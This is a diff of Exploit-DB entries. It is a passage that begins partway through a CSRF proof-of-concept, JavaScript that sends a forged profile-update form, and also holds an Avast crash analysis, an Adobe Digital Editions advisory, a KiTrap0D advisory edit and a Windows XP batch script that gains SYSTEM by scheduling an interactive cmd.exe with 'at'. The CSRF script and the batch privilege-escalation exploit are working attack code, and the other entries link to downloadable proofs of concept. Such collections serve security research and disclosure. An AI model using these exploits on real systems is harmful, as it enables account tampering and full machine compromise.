"test\r\n" +
"------WebKitFormBoundarywXBZovhmb3VnFJdz\r\n" +
"Content-Disposition: form-data; name=\"avatar\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundarywXBZovhmb3VnFJdz\r\n" +
"Content-Disposition: form-data; name=\"save-info\"\r\n" +
"\r\n" +
"Save\r\n" +
"------WebKitFormBoundarywXBZovhmb3VnFJdz\r\n" +
"Content-Disposition: form-data; name=\"user_id\"\r\n" +
"\r\n" +
"2\r\n" +
"------WebKitFormBoundarywXBZovhmb3VnFJdz--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
#Getting user id
In a published project there is a button contact project owner with the corresponding UID --> url: http://[IP]/my-account/private-messages/?rdr=&pg=send&uid=1&pid=34.
Also a mouseover in the user profile (Feedback) will reveal the userid.
Temporary Workaround and Fix
============================
No fix
History
=======
2015-12-20 Problem discovery during code review
2016-01-12 Vendor contacted
2016-01-12 Vendor response (check in progress)
2016-01-26 Vendor contacted (asked for status update)
2016-01-26 Vendor reponse (check in progress)
2016-02-05 Vendor contacted (advisory will be released in 30 days)
2016-03-07 Vendor contacted (asked for last status update)
2016-03-07 Vendor response (vulnerabilities should be fixed in the last update 2.0.9.7 on 1st march 2016, not verified by the LSE)
2016-03-08 Advisory release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
iQIcBAEBCAAGBQJW3ojFAAoJEDgSCSGZ4yd8iQIQAOYTS8WaW0Tkw8JMwssV/N8F
8O6tk4BYAkBbaMhk8rPBZBKcny7hTUiCsfLr7PYby9O3hcLmGMajhhyYg+5jjw1x
XUQc6dsER9UAj7OukUHxqJH2trQvcQfCOQUx7iNgV4lHNfpOGDOBVvZYA/YNE6uF
mUuyoGDdHlE3jE9WVGamsy2t5lrY5HOYXK6ZJkAv79MkeM6Dzdt2VXdZmN4UHzec
NkAm0fvML143dcBt3BsuCsE5AhfBJGOesAUMkE7Z29HTux1fBrNyYs4KhzumSALy
2I7h4WTozJMXBufEZkvqcGA6ikWATr31SzaUGjzyko96whegkNizJhpFqbAwtlZZ
tz32tXjf97c+3mmpKvkHqsln2oPWJrfAEV2q96SlOuevFo38uJSYb31NNZrtfx7I
5FoXr8ZgR98VIxeQcceF021JvM95J0ciLWWLkRYoE3VP1pQz9frrX7QfUU5+QrqT
gCC49pWbeK00aVdlqgc3oquJd8kk4fVZ59HOaNJldQh2BM9isFscbQ8fDmYJna/K
0VzgaoItc0OBR4hLywPi2MEVvHQm3r7Qe4JGsnr1imRg7i84GfbsuYsG8UH/FkDP
4nWQnKcZFTrNzTNQdsvho/P6/d3Efp5zJr+GVkNwI4242yAYHaAfcfy+DzK7vDH+
b3FqvVBebtLXMXwgRwx0
=NlIz
-----END PGP SIGNATURE-----

125
platforms/windows/dos/39530.txt Executable file
View file

@ -0,0 +1,125 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=668
The attached PE file causes memory corruption in Avast, it looks related to authenticode parsing.
(474.c0c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740b4454 esp=10cedfa8 ebp=12555e70 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
aswCmnBS_74080000!StreamHashClose+0x7dd4:
740b4454 8b06 mov eax,dword ptr [esi] ds:002b:30303030=????????
0:080> ub
aswCmnBS_74080000!StreamHashClose+0x7dc5:
740b4445 55 push ebp
740b4446 56 push esi
740b4447 57 push edi
740b4448 33ff xor edi,edi
740b444a 8be9 mov ebp,ecx
740b444c 85db test ebx,ebx
740b444e 7447 je aswCmnBS_74080000!StreamHashClose+0x7e17 (740b4497)
740b4450 8b742418 mov esi,dword ptr [esp+18h]
0:080> dd esp+18 L1
10cedfc0 30303030
# It looks like this address was a parameter, lets skip up a frame and see where it comes from
0:080> kvn 3
# ChildEBP RetAddr Args to Child..............
WARNING: Stack unwind information not available. Following frames may be wrong.
00 10cedfb4 740b483e 30303030 30303030 a00be921 aswCmnBS_74080000!StreamHashClose+0x7dd4
01 10cedfe8 740c37e7 12481a88 00cf0400 00000008 aswCmnBS_74080000!StreamHashClose+0x81be
02 10cee028 740aa2f5 12481a90 00001730 00030408 aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7
0:080> .frame /c 1
01 10cedfe8 740c37e7 aswCmnBS_74080000!StreamHashClose+0x81be
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740b483e esp=10cedfbc ebp=73e1dca8 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
aswCmnBS_74080000!StreamHashClose+0x81be:
740b483e 8bf8 mov edi,eax
0:080> ub.
aswCmnBS_74080000!StreamHashClose+0x81aa:
740b482a 0000 add byte ptr [eax],al
740b482c 0001 add byte ptr [ecx],al
740b482e 0000 add byte ptr [eax],al
740b4830 00ff add bh,bh
740b4832 7044 jo aswCmnBS_74080000!StreamHashClose+0x81f8 (740b4878)
740b4834 8bce mov ecx,esi
740b4836 ff7040 push dword ptr [eax+40h]
740b4839 e802fcffff call aswCmnBS_74080000!StreamHashClose+0x7dc0 (740b4440)
# The parameter comes from eax+40:
0:080> dd eax+40 L1
128be3a4 30303030
# What is that address?
0:080> !address @eax
Mapping file section regions...
Mapping module regions...
Mapping PEB regions...
Mapping TEB and stack regions...
Mapping heap regions...
Mapping page heap regions...
Mapping other regions...
Mapping stack trace database regions...
Mapping activation context regions...
Usage: Heap
Base Address: 128b8000
End Address: 128ea000
Region Size: 00032000
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
Type: 00020000 MEM_PRIVATE
Allocation Base: 12150000
Allocation Protect: 00000004 PAGE_READWRITE
More info: heap owning the address: !heap 0x120000
More info: heap segment
More info: heap entry containing the address: !heap -x 0x128be364
# It's a heap buffer, is it valid?
0:080> !heap -x 0x128be364
Entry User Heap Segment Size PrevSize Unused Flags
-----------------------------------------------------------------------------
128bd038 128bd040 00120000 122ef5e0 1408 - 3f LFH;busy.
# Looks okay to me, where does that buffer come from?
0:080> .frame /c 2
02 10cee028 740aa2f5 aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740c37e7 esp=10cedff0 ebp=128be364 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7:
740c37e7 83c40c add esp,0Ch
0:080> ub
aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xe3:
740c37d3 0000 add byte ptr [eax],al
740c37d5 0000 add byte ptr [eax],al
740c37d7 8b464c mov eax,dword ptr [esi+4Ch]
740c37da 57 push edi
740c37db 0345e8 add eax,dword ptr [ebp-18h]
740c37de 50 push eax
740c37df ff7510 push dword ptr [ebp+10h]
740c37e2 e88bc70000 call aswCmnBS_74080000!BZ2_bzerr+0x1d62 (740cff72)
0:080> dd ebp-18 L1
128be34c 57d9ddea
That is a really strange offset! And that DWORD appears in the input file at offset 316b3h:
│000316a0 a8 65 18 e9 79 40 62 25-96 6e c7 c7 37 6a 83 21 |?e??y@b%?n??7j?!|...
│000316b0 08 8e 41 ea dd d9 57 3f-1d 77 49 87 2a 16 06 5e |??A???W??wI?*??^|...
│000316c0 a6 38 6a 22 12 a3 51 19-83 7e b6 00 00 31 82 04 |?8j"??Q??~? 1??|...
This looks like broken authenticode parsing to me.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39530.zip

51
platforms/windows/dos/39533.txt Executable file
View file

@ -0,0 +1,51 @@
########################################################################################
# Title: Adobe Digital Editions <= 4.5.0 - Critical memory corruption
# Application: Adobe Digital Editions
# Version: 4.5.0 and earlier versions
# Platform: Windows, Macintosh, iOS and Android
# Software Link: http://www.adobe.com/solutions/ebook/digital-editions.html
# Date: March 8, 2016
# CVE: CVE-2016-0954
# Author: Pier-Luc Maltais from COSIG
# Contact: https://twitter.com/COSIG_
# Personal contact: https://twitter.com/plmaltais
########################################################################################
===================
Introduction:
===================
Adobe® Digital Editions software offers an engaging way to view and manage eBooks and
other digital publications. Use it to download and purchase digital content, which can
be read both online and offline. Transfer copy-protected eBooks from your personal
computer to other computers or devices. Organize your eBooks into a custom library and
annotate pages. Digital Editions also supports industry-standard eBook formats,
including PDF/A and EPUB. (http://www.adobe.com/ca_fr/products/digital-editions.html)
########################################################################################
===================
Report Timeline:
===================
2015-10-24: Pier-Luc Maltais from COSIG found the issue and report it to Adobe PSIRT.
2016-03-08: Vendor fixed the issue (APSB16-06).
2016-03-08: Release of this advisory.
########################################################################################
===================
Technical details:
===================
A critical memory corruption occurs when Adobe Digital Editions handle a specially
crafted ExtGstate object, which could lead to remote code execution.
########################################################################################
==========
POC:
==========
https://plmsecurity.net/sites/plmsecurity.net/files/APSB16-06_PoC.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39533.zip
########################################################################################

7
platforms/windows/local/11199.txt
View file

@ -1,4 +1,7 @@
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip (KiTrap0D.zip)
EDB Note: Make sure to run "vdmallowed.exe" (pre-compiled) inside the subfolder.
Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
-------------------------------------------------------------------------
@ -151,11 +154,11 @@ described above.
.text:0043C426 retn 4
/* ... */
Possibly naive example code for triggering this condition is availble from the
Possibly naive example code for triggering this condition is available from the
link below.
http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/KiTrap0D.zip
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip (KiTrap0D.zip)
The code has been tested on Windows XP, Windows Server 2003/2008, Windows Vista
and Windows 7. Support for other affected operating systems is left as an

17
platforms/windows/local/35850.bat
View file

@ -1,10 +1,14 @@
source: http://www.securityfocus.com/bid/48232/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition.
@echo off
REM
REM source: http://www.securityfocus.com/bid/48232/info
REM
REM Microsoft Windows is prone to a local privilege-escalation vulnerability.
REM
REM A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges.
REM Successful exploits will result in the complete compromise of affected computers.
REM Failed exploit attempts may cause a denial-of-service condition.
REM
echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
start time /T > time.txt
tskill explorer
@ -25,7 +29,6 @@ at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
echo [*] Backup time
time < time.txt